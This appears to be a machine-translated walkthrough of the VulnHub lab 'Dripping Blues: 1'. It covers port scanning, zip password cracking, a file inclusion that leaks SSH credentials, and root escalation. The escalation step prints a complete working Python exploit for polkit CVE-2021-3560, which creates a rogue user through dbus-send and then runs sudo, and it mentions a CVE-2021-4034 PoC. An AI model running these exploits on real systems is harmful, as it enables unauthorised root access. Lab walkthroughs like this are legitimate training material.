Prepare:
Attacker: virtual machine kali, native win10.
Target machine: DRIPPING BLUES: 1, the network segment address is the bridge I set here, so it is on the same network segment as the local computer, download address: https://download.vulnhub.com/drippingblues/drippingblues.ova, directly vm after downloading Just open it.
Knowledge points: CVE-2021-3560 exploit (polkit vulnerability), fcrackzip blasting zip file password, file inclusion.
collect message:
Scan the surviving host address in the lower network segment through nmap, determine the address of the target machine: nmap -sn 192.168.4.0/24, get the target machine address: 192.168.4.146
Scan the service corresponding to the port: nmap -T4 -sV -p- -A 192.168.4.146, which shows that ports 21, 22, and 80 are opened, and the ftp service, ssh service, and web service are opened.
Try to access the ftp service and find that you do not need an account name and password, you can log in directly, send a respectmydrip.zip file in the ftp service, download it and decompress it, and find that a password is required.
Looking at port 80, it shows a string and two account names: travisscott & thugger, visit robots.txt (obtained during nmap scanning), and send two files: dripisreal.txt and /etc/dripispowerful.html.
Visit dripisreal.txt and /etc/dripispowerful.html, and get prompt information in the dripisreal.txt file, but the /etc/dripispowerful.html file cannot be accessed, so it is guessed that there is a file containing vulnerability.
Directory scan:
Use dirmap for directory scanning to get index.php and robots.txt (this is known above)
fcrackzip password cracking:
Use fcrackzip for password blasting, command: fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u respectmydrip.zip, get the password: 072528035.
After decompression, you get the respectmydrip.txt file and the secret.zip file. The respectmydrip.txt file is a message: just focus on "drip". The secret.zip file also requires a password, but this is not cracked.
The file contains the vulnerability:
Visit the index.php page, think of the prompt: just focus on "drip", guess that the parameter drip exists, visit /etc/dripispowerful.html, and successfully obtain the password: imdrippinbiatch.
Get a shell:
Use the account name and password: thugger/imdrippinbiatch to connect to ssh and successfully obtain shell permissions.
It is found that the user.txt file exists under the current account, and the file is read to obtain the first flag.
Elevation of rights:
Enter the command: sudo -l to check which privileged commands are currently available, and the display does not exist.
Check the file with root permissions, the command: find / -perm -4000 -type f 2>/dev/null, found that there is a /usr/lib/policykit-1/polkit-agent-helper-1 (emmm, what a coincidence , in the last article CORROSION: 2 of the vulnhub shooting range also encountered this vulnerability: CVE-2021-4034)
This website: https://github.com/arthepsy/CVE-2021-4034, download the poc and compile it with gcc on kali, and then upload it to the target machine for execution, but it is found that the target machine lacks gcc and cannot be executed. Find the rest of the polkit vulnerabilities.
Find the exploitable exp of polkit on github and find that there are mainly two, one is CVE-2021-3560 and the other is CVE-2021-4034 (this has been tested above, it cannot be executed due to lack of gcc, so then test under CVE-2021-3560)
On this website: https://github.com/Almorabea/Polkit-exploit Download the exploitable exp (the download is very slow, copy the code can also be used), and upload it to the target machine to give execution permission, and then execute to obtain root permissions.
import os import sys import time import subprocess import random import pwd print ("**************") print("Exploit: Privilege escalation with polkit - CVE-2021-3560") print("Exploit code written by Ahmad Almorabea @almorabea") print("Original exploit author: Kevin Backhouse ") print("For more details check this out: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/") print ("**************") print("[+] Starting the Exploit ") time.sleep(3) check = True counter = 0 while check: counter = counter +1 process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply','/org/freedesktop/Accounts','org.freedesktop.Accounts.CreateUser','string:ahmed','string:"Ahmad Almorabea','int32:1']) try: #print('1 - Running in process', process.pid) Random = random.uniform(0.006,0.009) process.wait(timeout=Random) process.kill() except subprocess.TimeoutExpired: #print('Timed out - killing', process.pid) process.kill() user = subprocess.run(['id', 'ahmed'], stdout=subprocess.PIPE).stdout.decode('utf-8') if user.find("uid") != -1: print("[+] User Created with the name of ahmed") print("[+] Timed out at: "+str(Random)) check =False break if counter > 2000: print("[-] Couldn't add the user, try again it may work") sys.exit(0) for i in range(200): #print(i) uid = "/org/freedesktop/Accounts/User"+str(pwd.getpwnam('ahmed').pw_uid) #In case you need to put a password un-comment the code below and put your password after string:yourpassword' password = "string:" #res = subprocess.run(['openssl', 'passwd','-5',password], stdout=subprocess.PIPE).stdout.decode('utf-8') #password = f"string:{res.rstrip()}" process = subprocess.Popen(['dbus-send','--system','--dest=org.freedesktop.Accounts','--type=method_call','--print-reply',uid,'org.freedesktop.Accounts.User.SetPassword',password,'string:GoldenEye']) try: #print('1 - Running in process', process.pid) Random = random.uniform(0.006,0.009) process.wait(timeout=Random) process.kill() except subprocess.TimeoutExpired: #print('Timed out - killing', process.pid) process.kill() print("[+] Timed out at: " + str(Random)) print("[+] Exploit Completed, Your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root ") p = subprocess.call("(su ahmed -c 'sudo su')", shell=True)
Use the root account to successfully read the flag information under /root.
I was bored, installed gcc using the root account, then switched back to the thugger account, and executed the exp of CVE-2021-4034. At this time, root privileges can also be obtained normally.